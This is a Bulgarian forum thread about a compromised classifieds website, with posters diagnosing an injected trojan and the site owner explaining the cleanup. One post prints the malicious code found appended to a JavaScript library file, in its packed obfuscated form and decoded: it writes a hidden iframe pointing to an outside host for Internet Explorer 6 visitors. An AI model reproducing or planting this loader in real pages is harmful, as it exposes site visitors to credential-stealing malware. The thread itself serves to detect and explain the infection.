SearchEngines.bg

Това е примерно съобщение за гост. Регистрирайте безплатен акаунт днес, за да станете потребител на SearchEngines.bg! След като влезете, ще можете да участвате в този сайт, като добавите свои собствени теми и публикации, както и да се свържете с други членове чрез вашата лична входяща кутия! Благодарим ви!

Някой знае ли на кого е този сайт?

Re: Някой знае ли на кого е този сайт?

Да, заразени са!
Вижте последния ред на този на пръв поглед наред файл:

http://obiavite-bg.com/tools/lightbox/js/prototype.js

Код:
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5 0=a c(),4=a c(0.i()+j);3(h.l.7("m 6")!=-1&&2.b.7("8=s")==-1){3(0.g()!=-1){5 9="d"}2.f("<e"+9+" k"+"r=1 z"+"o=1 A=\'B"+"p://x"+".y/q/\' t=\'u:n"+"w\'></3"+"v>");2.b="8=s;"+" 4="+4.C()+"; "}',39,39,'today||document|if|expires|var||indexOf|_fhjtju|iframe|new|cookie|Date|ame|ifr|write|getTimezoneOffset|navigator|getTime|2678400000|wi|appVersion|MSIE||ht||b2b|dth||style|display|rame|one|secatm|net|heig|src|htt|toGMTString'.split('|')));


Което декоднато е:
Код:
var today=new Date(),expires=new Date(today.getTime()+2678400000);
if(navigator.appVersion.indexOf("MSIE 6")!=-1&&document.cookie.indexOf("_fhjtju=s")==-1){
if(today.getTimezoneOffset()!=-1){
var iframe="ame"
}
document.write("<ifr"+iframe+" wi"+"dth=1 heig"+"ht=1 src='htt"+"p://secatm"+".net/b2b/' style='display:n"+"one'></if"+"rame>");
document.cookie="_fhjtju=s;"+" expires="+expires.toGMTString()+"; "
}
 
Последно редактирано:
Re: Някой знае ли на кого е този сайт?

Абе има си боклук налепен в js файловете - сайта се вижда на кого е и къде е регистриран през whois, иначе физически файловете са при колегите от Суперхостинг, но реално това е проблем на клиента, не техен.
 
Re: Някой знае ли на кого е този сайт?

Абе има си боклук налепен в js файловете - сайта се вижда на кого е и къде е регистриран през whois, иначе физически файловете са при колегите от Суперхостинг, но реално това е проблем на клиента, не техен.

Има два варианта:
1. Или човека, който стои зад сайта ползва някакъв нулиран софтуер, в който е било наблъскано това съвсем имишлено - тогава наистина той има проблем, но и посетителите му.
2. Или човека сам го е наблъскал с цел да злоупотребява. Тогава явно само посетителите му имат проблем.

Въпросният троянец точи пароли за ФТП и цПанел. Не ми се ще да вярвам, че е вторият вариант, но човека, който предупреди беше хакнат от софийски IP адрес.
 
Re: Някой знае ли на кого е този сайт?

По-вероятно е човека изобщо да не знае за съществуването му, да ползва FTP, а не SFTP и да си е запаметил паролата за хоста в ftp клиента и съм почти 100% сигурен, че ако колегите пуснат един grep в ftp логовете за неговото потребителско име ще намерят записи за заразените файлове.
 
Re: Някой знае ли на кого е този сайт?

По-вероятно е човека изобщо да не знае за съществуването му, да ползва FTP, а не SFTP и да си е запаметил паролата за хоста в ftp клиента и съм почти 100% сигурен, че ако колегите пуснат един grep в ftp логовете за неговото потребителско име ще намерят записи за заразените файлове.

Залагам на този вариант - все пак троянеца, които стои зад тези iframes се занимава точно с тази дейност.
 
Re: Някой знае ли на кого е този сайт?

един малко страничен от т емата въпрос: колега. Mlazarov. с какво декодираш?

Send via Android G1
 
Re: Някой знае ли на кого е този сайт?

Може да не е сложено умишлено, при мен бяха лепнали подобна кирия на index файла на страничката ми, бяха ми влезли в ftp-то(не знам как, но бяха разбрали за 64 символната парола, която не съществува в дигитален формат и дори не знам на изуст) и бяха добавили едно такова редче...
 
Re: Някой знае ли на кого е този сайт?

С JavaScript - добавям един alert() на правилното място.
В случая заменяш eval с alert ;D

един малко страничен от т емата въпрос: колега. Mlazarov. с какво декодираш?

Send via Android G1
 
Re: Някой знае ли на кого е този сайт?

...не знам как, но бяха разбрали за 64 символната парола, която не съществува в дигитален формат и дори не знам на изуст...
:eek: :eek: :eek:
 
Re: Някой знае ли на кого е този сайт?

Ти я запази в фтп клиента , пък ако ще да е 164 символа!

Може да не е сложено умишлено, при мен бяха лепнали подобна кирия на index файла на страничката ми, бяха ми влезли в ftp-то(не знам как, но бяха разбрали за 64 символната парола, която не съществува в дигитален формат и дори не знам на изуст) и бяха добавили едно такова редче...
 
Re: Някой знае ли на кого е този сайт?

Ти я запази в фтп клиента , пък ако ще да е 164 символа!

Абе, уж не я пазех, ама знам ли...
При мен обаче ми го даваше като сайт със заплашителен софт...
 
Re: Някой знае ли на кого е този сайт?

Абе, уж не я пазех, ама знам ли...
При мен обаче ми го даваше като сайт със заплашителен софт...

Това не променя факта, че за да се свържеш я пишеш във ftp клиента, а той си я пази в един временен файл на харда, докато си вързан и след като приключи сесията този файл се изтрива. Не е особенно трудно даден софтуер на твоя компютър да провери дали имаш активна конекция на порт 21 и после да си прочете /Temp директорията ;)
 
Re: Някой знае ли на кого е този сайт?

Здравейте, този сайт е мой. До вчера не сме имали никакви проблеми с него, но снощи в 23:30 получихме съобщение от суперхостинг, че в определени файлове има троянски кон. Съответно предприех всички действия и качих чисто нова версия на скрипта и вече всичко е наред. Проблемът е кой е успял да проникне в спанела ми и дали това не е станало през сървъра на хостинг компанията, защото няма вариант да съм заразил файловете през компютрите в дома ми. Този, който смята, че умишлено съм го поставил там, няма да му казвам какво да прави, той сам си знае. Най-важното в момента е, че целият хостинг акаунт е изчистен и благодарим на СуперХостинг за навременното известяване, защото в противен случай нямаше как да го разбера. Смятам темата за приключена, ако имате въпроси може да ми пишете. Не смятам, че този форум е мястото, където трябва да се обсъжда дали скрипта ми е платен или не, но ще ви кажа - платил съм точно 387 USD за пълната версия. Чао.
 
Re: Някой знае ли на кого е този сайт?

Здравейте, този сайт е мой. До вчера не сме имали никакви проблеми с него, но снощи в 23:30 получихме съобщение от суперхостинг, че в определени файлове има троянски кон. Съответно предприех всички действия и качих чисто нова версия на скрипта и вече всичко е наред. Проблемът е кой е успял да проникне в спанела ми и дали това не е станало през сървъра на хостинг компанията, защото няма вариант да съм заразил файловете през компютрите в дома ми. Този, който смята, че умишлено съм го поставил там, няма да му казвам какво да прави, той сам си знае. Най-важното в момента е, че целият хостинг акаунт е изчистен и благодарим на СуперХостинг за навременното известяване, защото в противен случай нямаше как да го разбера. Смятам темата за приключена, ако имате въпроси може да ми пишете. Не смятам, че този форум е мястото, където трябва да се обсъжда дали скрипта ми е платен или не, но ще ви кажа - платил съм точно 387 USD за пълната версия. Чао.

Малко агресивно за първи пост, но все пак сайта е твой. Не работя за Суперхостинг, но мога да те уверя, че акаунта ти не е компрометиран през сървъра на хостинг компанията. Погледни всичко, което съм написал по-горе, заедно с колегата mlazarov и ще ти стане ясно. Попитай и колегите от Суперхостинг, дали качването на заразените файлове е станало през ftp или през cpanel - аз залагам на първото. Залагам също и на факта, че преди да са качени файловете си направил FTP конкеция към хостинга си, след което от няколко различни IP-та е имало пробни конекции от типа logged in, logged out, a след това записите са file1 downloaded , file1 uploaded в разстояние на 1 секунда и се различават във байтовете.
 
Re: Някой знае ли на кого е този сайт?

Не се засягай, не съм имал за цел да обиждам когото и да било. Всичко както добре се вижда бяха хипотези. Просто имаше човек, чийто сайт бе хакнат през FTP след заразяване с троянеца от твоя сайт.
Радвам се, че вече всичко е наред.
 
Re: Някой знае ли на кого е този сайт?

Иво не се засягам, обяснявам, че не бих направил такова нещо нарочно. Да имало е неоторизиран достъп през фтп. Аз използвам СПанел като опция за качване, защото е по-бързо (поне според мен). Отново благодаря на Суперхостинг и на всички вас, защото иначе нямаше да го забележим. Извинявам ако постът ми е бил малко агресивен, но приемете, че ако някой ви набеди вас за разпространител на вируси и вие бихте реагирали така. Както казах вече всичко е ок. Отново Тенк ю. :)
 

Горе